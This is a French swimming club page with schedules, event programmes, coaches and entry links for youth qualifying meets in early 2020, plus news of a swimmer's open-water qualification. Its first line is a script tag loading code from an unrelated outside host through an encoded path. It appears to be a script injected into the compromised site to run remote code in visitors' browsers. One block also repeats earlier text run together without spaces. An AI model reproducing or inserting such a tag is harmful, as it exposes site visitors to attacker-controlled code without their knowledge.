<script type="text/javascript" src="https://webform.statslive.info/ow/eyJpdiI6InpkTENqVzh6MjZQcXg1Y25xY3JcL0tVbTN1OTA1dXFCQWQrMzUrK0FXVDZjPSIsInZhbHVlIjoiYXNtQU5PNGZ6VERSVEtGS2JLc0ZoMzVaYlJwMStlNXQ3bGtrRW5tMldhcz0iLCJtYWMiOiI0M2FiMjgyMGIxZDk3YzBjZjA2N2E4NWRhODY3ZGQwYjhiYzE3ZDJiMjE2ZmUzM2NjZDAzODZiMjhmNGY0MDc5In0="></script>
La troisième journée qualificative se déroulera le dimanche 8 mars à Trappes
Dimanche 08/03/2020 OP : 13h30 – DE : 14h15
Consigne piscine de Trappes :
Au vu de la FMI de la piscine de Trappes (et de la place autour du bassin), nous ferons rentrer en priorité les nageurs et nageuses, les entraîneurs, les officiels et en fonction de la place restantes les parents pourront rentrer dans la piscine. En ce sens, il serait préférable de privilégier le covoiturage. Merci de votre compréhension.
Catégories: Filles 2010 – Filles 2011 et après – Garçons 2009 – Garçons 2010 – Garçons 2011 et après
Les nageurs devront être titulaires de l’ENF 3.
Programme: F 2011 et G 2010 et après : 50 par spécialité + 200 NL et 100 4N et F 2010 et G 2009 : 100 par spécialité + 400 NL et 200 4N
3ème PLOT: 50 DOS – 100 DOS – 50 BRA – 100 BRA – 200 NL – 400 NL – 4x50 4N
Encadrement: Laura
Les engagements sont "ici"
La troisième journée Jeunes se déroulera à Chevreuse et Houilles
Samedi: CHEVREUSE OP : 15h00 – DE : 15h45 Tous les clubs
Dimanche 15/03/2020 à HOUILLES OP : 13h00 – DE : 13h45
Catégories: FILLES 2007-2009 – GARCONS 2006-2008
Programme:
Samedi: 200 NL D/M - 200 4N D/M – 50 NL D/M – 100 DOS D/M – 200 BR D/M – 400 NL D/M – 50 BR D/M – 100 PAP D/M
Dimanche: 50 DOS D/M – 100 NL D/M – 200 PAP D/M – 200 DOS D/M – 50 PAP D/M – 100 BR D/M - 400 4N D/M
Encadrement: Jérôme
Les engagements: A Venir
La troisième journée qualificative se déroulera à Mantes la Ville le samedi 29 février et dimanche 01 mars
Samedi 29/02/2020 OP : 17h30 – DE : 18h15
Dimanche 1er/03/2020 OP : 13h30 – DE : 14h15
Catégories : JEUNES et plus
Programme:
Samedi 29/02/2020 : 800 NL D/M – 50 DOS D/M – 50 NL D/M – 200 BR D/M - 400 NL D/M –
200 DOS D/M – 50 PAP D/M – 100 BR D/M – 100 4N D/M
Dimanche 1er/03/2020 : 1500 NL D/M – 100 PAP D/M- 50 BR D/M – 200 NL D/M – 200 4N D/M –
200 PAP D/M – 100 DOS D/M – 100 NL D/M – 400 4N D/M
Encadrement: Thibault /Jérôme
Les engagements sont "ici"
Pré qualification pour Alexis pour les championnats d’Europe d’eau libre !!
En réalisant un temps de 15.26.76 sur le 1500 Nage Libre au meeting de Chalon
Alexis réalise son objectif du week-end
Départ pour Doha où Alexis participera à la coupe du monde eau libre.
Souhaitons lui de terminer dans les 16 premiers pour se qualifier aux Championnats d'Europe
La deuxième journée jeunes se déroulera à Chevreuse et Versailles Satory
Encadrement: Jérôme
Samedi 1er à Chevreuse OP : 15h00 - DE : 15h45
Dimanche 02 à Versailles Satory OP : 13h30 – DE : 14h15
Catégories: FILLES 2007-2009 – GARCONS 2006-2008
Journées qualificatives aux Championnats de France des Jeunes, aux Championnats Régionaux des Jeunes et au Meeting Départemental des Jeunes
Programme:
Samedi 01/02/2019 : 1500 NL D – 800 NL M - 200 4N D/M – 50 NL D/M – 100 DOS D/M – 200 BR D/M – 400 NL - 50 BR D/M – 100 PAP D/M – 200 NL D/M
Dimanche 02/02/2020 : 800 NL D – 1 500 NL M – 50 DOS D/M – 100 NL D/M – 200 PAP D/M – 200 DOS D/M - 50 PAP D/M – 100 BR D/M - 400 4N D/M
CATEGORIES: FILLES 2007-2009 –GARCONS 2006-2008Qualificativesaux Championnats de France des Jeunes, aux Championnats Régionaux des Jeunes et au Meeting Départemental des JeunesPROGRAMME:PLOT 2Samedi 01/02/2019:1500 NL D –800 NL M -200 4N D/M –50 NL D/M –100 DOS D/M –200 BR D/M –400 NL-50 BR D/M–100 PAP D/M –200NLD/MDimanche 02/02/2020: 800 NL D –1500 NL M –50 DOS D/M –100 NL D/M –200 PAP D/M–200 DOS D/M-50 PAP D/M –100 BR D/M-400 4N D/MENGAGEMENTS: 5 engagements maximum par nageur par week-end.PLOT 2: Les engagements devront être saisis sur EXTRA
La deuxième Journée de qualification Avenir Plot 2 se déroulera le dimanche 26 janvier 2020 à Trappes
Dimanche: TRAPPES OP : 13h30 – DE : 14h15
Encadrement: Laura
Catégories: Filles 2010 – Filles 2011 et après – Garçons 2009 – Garçons 2010 – Garçons 2011 et après
Programme: F 2011 et G 2010 et après : 50 par spécialité + 200 NL et 100 4N et F 2010 et G 2009 : 100 par spécialité + 400 NL et 200 4N
2 ème Plot : 50 PAP – 100 PAP – 50 NL – 100 NL – 100 4N – 200 4N – 4X50 NL
Les engagements sont "ici"
Le meeting de Massy se déroulera du vendredi 20 au dimanche 22 décembre.
Les nageurs des groupes Avenirs et jeunes participeront au meeting Catherine BRUNET
Catégories : Avenirs (F 2010 et + / G 2009 et + ) ayant obligatoirement le Pass’compétition et Jeunes (F 2007/2008/2009 et G 2006/2007/2008)
Encadrements: Laura et Jérôme
La plaquette du meeting est "ici"
Les engagements sont "ici"